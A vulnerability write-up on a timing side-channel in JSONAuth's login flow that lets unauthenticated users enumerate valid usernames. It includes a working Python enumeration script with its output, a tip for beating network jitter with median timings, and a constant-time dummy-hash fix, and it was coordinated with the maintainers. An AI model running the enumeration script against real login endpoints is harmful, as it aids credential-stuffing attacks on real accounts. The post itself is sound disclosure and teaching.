The Clock Doesn't Lie: Timing Attacks in Authentication Flows

CATEGORY: RESEARCH DATE: 2026-03-21

Research by badjuju - Red Orca

A timing side-channel in JSONAuth allows unauthenticated attackers to enumerate valid usernames based on response time differences.

Beyond the Status Code

When you’re poking at a login endpoint, the first thing you usually look at is the response: did I get a 200, a 401, or maybe a lucky 500 error?

But sometimes the most interesting part of the response isn’t the body or the status code—it’s the timing.

While reviewing a CVE in a similar project, I started wondering if those same patterns existed here. I decided to dive into auth/json.go to see if this project was susceptible to the same kind of timing side-channel. It didn’t take long to find exactly what I was looking for: a flaw that basically lets you enumerate users with nothing more than a stopwatch.


The Flaw: Efficiency as a Weakness

The issue is a “fail-fast” pattern in the authentication logic. The code looks up the user in the database before it even touches the password validation:

user, err := userStore.Get(username)
if err != nil {
    // The "Fast Path"
    return nil, fmt.Errorf("unable to get user from store: %v", err)
}

// The "Slow Path"
err = users.CheckPwd(password, user.Password)
if err != nil {
    return nil, err
}

From a performance standpoint, this makes total sense. Why burn CPU time checking a password if the username doesn’t even exist?

But there’s a catch: bcrypt is slow by design. Its configurable work factor makes each password check computationally expensive, which helps slow down brute-force attempts. By putting that check after the database lookup, the developers accidentally created two very different speeds for the login process:

Unknown username: the lookup fails, the function returns immediately, and the whole request finishes in a few milliseconds.
Known username: the lookup succeeds, bcrypt runs, and the response takes roughly 40ms longer.

That 40ms gap might not seem like much, but once you automate it, it becomes really obvious.
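The two speeds are easy to reproduce locally. Here's a minimal Python simulation of the same fail-fast pattern; it stands in `hashlib.pbkdf2_hmac` with a high iteration count for bcrypt's work factor (the user names and iteration count are illustrative, not from the real codebase):

```python
import hashlib
import time

# pbkdf2 with a high iteration count plays the role of bcrypt's
# configurable work factor in this sketch.
USERS = {"admin": hashlib.pbkdf2_hmac("sha256", b"secret", b"salt", 200_000)}

def login(username: str, password: str) -> bool:
    stored = USERS.get(username)
    if stored is None:
        return False  # fast path: no hashing at all
    # slow path: the expensive hash only runs for real users
    return hashlib.pbkdf2_hmac("sha256", password.encode(), b"salt", 200_000) == stored

def timed(username: str) -> float:
    start = time.perf_counter()
    login(username, "wrong-password")
    return time.perf_counter() - start

fast = timed("ghost")   # unknown user: returns almost instantly
slow = timed("admin")   # known user, wrong password: pays the full hash cost
print(f"unknown user: {fast:.4f}s, known user: {slow:.4f}s")
```

The gap between `fast` and `slow` is exactly the signal the PoC below keys on.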


Proving the Point (PoC)

To see if this was actually exploitable over a network, I put together a quick script. The goal was to establish a “baseline” for a fake user and then see if real usernames stood out.

import requests
import time
import statistics

TARGET_URL = "http://localhost/api/auth/login"
WORDLIST = ["admin", "root", "user2", "nonexistent_test_user"]

def measure(username):
    start = time.perf_counter()
    requests.post(
        TARGET_URL, 
        params={"username": username}, 
        headers={"X-Password": "wrong-password"}
    )
    return time.perf_counter() - start

# 1. Calibration
print("[*] Calibrating...")
baselines = [measure(f"not_a_user_{i}") for i in range(20)]
threshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)
print(f"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s")

# 2. Testing the list
for user in WORDLIST:
    t = measure(user)
    status = "VALID" if t > threshold else "invalid"
    print(f"{user:<20} | {t:.4f}s | {status}")

Even with typical network jitter, the results were consistent:

[*] Calibrating...
[*] Baseline: 0.0041s | Threshold: 0.0256s
admin                | 0.0505s | VALID
root                 | 0.0019s | invalid
user2                | 0.0464s | VALID
nonexistent_test_user| 0.0015s | invalid
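One sample per username worked here, but on a noisier link a single jitter spike can push a nonexistent user over the threshold. A simple hardening is to take several samples per name and classify on the median, which shrugs off individual spikes. A sketch using simulated timings (the numbers below are made up to illustrate the point, not taken from the run above):

```python
import statistics

def classify(samples, threshold):
    # The median is far less sensitive to a single jitter spike
    # than the mean or any individual sample.
    return "VALID" if statistics.median(samples) > threshold else "invalid"

# Simulated per-request timings in seconds, one jitter spike in each set.
fake_user = [0.004, 0.005, 0.031, 0.004, 0.005]  # the 0.031s spike would fool a single-sample check
real_user = [0.051, 0.048, 0.049, 0.112, 0.050]

threshold = 0.0256  # the calibrated threshold from the run above
print(classify(fake_user, threshold))  # invalid
print(classify(real_user, threshold))  # VALID
```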

The Real-World Impact

Is this a “break-glass” emergency? Not exactly—it doesn’t let an attacker bypass the password. However, it’s a huge gift for reconnaissance.

If an attacker knows exactly which usernames are valid, they don’t have to spray thousands of guesses into the void. They can focus their efforts on real accounts, making their brute-force or credential-stuffing attacks way more efficient and much harder to spot in the logs.


The Fix: Constant Time

The fix here is basically to make the app lie about how much work it’s doing. We want every request to take roughly the same amount of time, whether the user exists or not.

One way to handle this is to run a “dummy” bcrypt check when a user isn’t found:

// Even if the user is missing, run a check against a static dummy hash.
// The result is deliberately discarded; the point is to burn the same
// amount of CPU time as a real password comparison.
dummyHash := "$2a$12$examplehash..."
bcrypt.CompareHashAndPassword([]byte(dummyHash), []byte(password))

This forces the “slow path” every time, which removes the timing difference and closes off the side-channel. It’s also worth returning the same generic error for both failures, so the response body doesn’t leak what the timing no longer does.
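The same shape in runnable Python, again with pbkdf2 standing in for bcrypt (names, salt handling, and iteration count here are illustrative; real code stores a per-user salt inside the hash, as bcrypt does):

```python
import hashlib
import hmac

ITERATIONS = 200_000
SALT = b"illustrative-salt"  # sketch only; bcrypt embeds a per-user salt

# Dummy hash computed once at startup, used when the user doesn't exist.
DUMMY_HASH = hashlib.pbkdf2_hmac("sha256", b"dummy-password", SALT, ITERATIONS)

USERS = {"admin": hashlib.pbkdf2_hmac("sha256", b"secret", SALT, ITERATIONS)}

def login(username: str, password: str) -> bool:
    stored = USERS.get(username)
    # Always run the expensive hash, even for unknown users,
    # so both branches cost roughly the same wall-clock time.
    target = stored if stored is not None else DUMMY_HASH
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, ITERATIONS)
    ok = hmac.compare_digest(candidate, target)
    return ok and stored is not None

print(login("admin", "secret"))    # True
print(login("admin", "wrong"))     # False
print(login("ghost", "anything"))  # False, but just as slow as the others
```

`hmac.compare_digest` also keeps the byte comparison itself constant-time, which is cheap insurance on top of the dummy-hash trick.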

References & Discovery Timeline

This vulnerability was discovered during independent research and was coordinated with the maintainers via GitHub’s private security reporting feature.


Final Thoughts

This was a good reminder that “clean” or “efficient” code isn’t always secure code. In this case, trying to save a few milliseconds of CPU time actually created a privacy leak. When you’re building auth flows, sometimes you have to be a little inefficient to stay safe.


About

badjuju focuses on application security and vulnerability research, digging into how bugs happen and where things break in real systems.